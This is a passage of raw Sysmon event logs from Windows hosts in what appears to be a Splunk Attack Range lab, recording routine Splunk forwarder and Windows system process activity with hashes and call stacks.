11:09:13.659{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49300-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000295977Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:17.615{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E1ED6A8F9D0B357217BE1D39DCA1C376,SHA256=992BADAA17FFE578F35D285F3863320CCC42E9F102FE1CF5C343CBC7DAB9B0D4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220084Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:17.315{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=46136C687CB173FD0F1A09D993A18E3C,SHA256=4F77E21C69A233EF085A3425D974949E3CBE00EA43F9193CE075D15FBC9F8936,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295978Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:18.683{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EF811A1BC363E21D6A95870E300C08A0,SHA256=CF5EEB967DE29DCC899D7229D08B412E975C22CB8A66A63CD0B64B3D1B48CA6D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220085Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:18.315{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6C51D5046480C8534395A46F59938A84,SHA256=0B9E206CCC19AACADE7089B84ADAB19023A8C43004BB121EBAAB614C6076055D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000295996Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:19.842{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-15DF-6216-E306-000000003802}6900C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295995Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:19.842{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295994Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:19.842{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295993Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:19.842{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295992Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:19.842{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295991Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:19.842{C8EA50B7-F11C-6215-0500-000000003802}4122608C:\Windows\system32\csrss.exe{C8EA50B7-15DF-6216-E306-000000003802}6900C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000295990Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:19.842{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-15DF-6216-E306-000000003802}6900C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000295989Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:19.844{C8EA50B7-15DF-6216-E306-000000003802}6900C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000295988Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:19.704{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3D4DB8FD06162E2424EAE0D212E5A116,SHA256=F044E94C6C7FC69B92A4EDA0A70736A25D4BFF528BA7B377D9600A33EAE997B4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220086Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:19.331{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B6EC32807F381365482EA937E6EE1FFF,SHA256=89902A3B85768B10683C0B10B665EBDD0F9EC7C2AE39B8866EB821BAC875A9FD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000295987Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:19.619{C8EA50B7-15DF-6216-E206-000000003802}71604408C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295986Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:19.251{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-15DF-6216-E206-000000003802}7160C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295985Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:19.251{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295984Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:19.251{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295983Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:19.251{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295982Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:19.251{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295981Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:19.251{C8EA50B7-F11C-6215-0500-000000003802}412368C:\Windows\system32\csrss.exe{C8EA50B7-15DF-6216-E206-000000003802}7160C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000295980Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:19.251{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-15DF-6216-E206-000000003802}7160C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000295979Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:19.253{C8EA50B7-15DF-6216-E206-000000003802}7160C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000296008Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:20.826{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D609DD1494486B220509E51CFD41440D,SHA256=CE8AB021D8AE60CA0331BDDDAE5A70308B78F98258917147E7D3062B77D3CED3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296007Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:20.757{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5A53726BF9B35580E0FF8CD98650A625,SHA256=916CCD8D2696ABF19E1D1DC33532ADBDE0C1FEA94BA975E9BF23A5AA98B31CD8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000296006Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:20.704{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-15E0-6216-E406-000000003802}5720C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296005Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:20.704{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296004Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:20.704{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296003Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:20.704{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296002Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:20.704{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296001Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:20.704{C8EA50B7-F11C-6215-0500-000000003802}412368C:\Windows\system32\csrss.exe{C8EA50B7-15E0-6216-E406-000000003802}5720C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000296000Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:20.704{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-15E0-6216-E406-000000003802}5720C:\Program 